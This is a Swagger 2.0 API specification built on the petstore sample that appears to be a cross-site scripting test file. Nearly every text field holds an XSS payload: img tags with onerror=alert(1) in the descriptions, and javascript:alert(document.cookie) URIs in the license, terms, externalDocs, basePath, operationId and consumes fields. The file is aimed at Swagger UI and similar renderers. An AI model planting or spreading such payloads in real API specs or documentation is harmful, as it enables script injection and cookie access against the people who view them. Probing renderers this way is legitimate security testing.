swagger: "2.0"
info:
  description: "<img src=https://media.wired.com/photos/5c0b012587e1b12d64ab1697/master/pass/Quora-Hacked_Final.png onerror=alert(1); style='height:2000px;width:2000px;float:top;'> filters." 
  version: "1.0.0"
  title: "Jonathan JOhx"
  termsOfService: "'javascript:alert(document.cookie)"
  contact:
    email: "alert@gmail.om"
  license:
    name: "'javascript:alert(document.cookie)"
    url: "javascript:alert(document.cookie)"
host: "petstore.swagger.io"
basePath: "/javascript:alert(document.cookie)"
tags:
- name: "user"
  description: "<img src=https://media.wired.com/photos/5c0b012587e1b12d64ab1697/master/pass/Quora-Hacked_Final.png onerror=alert(1);>"
  externalDocs:
    description: "TESTING"
    url: "javascript:alert(document.cookie)"
schemes:
- "https"
- "http"
paths:
  /pet:
    get:
      tags:
      - "pet"
      summary: "Add a new pet to the store"
      description: ""
      operationId: "javascript:alert(document.cookie)"
      consumes:
      - "javascript:alert(document.cookie)"
      - "application/xml"

      responses:
        405:
          description: "Invalid input"
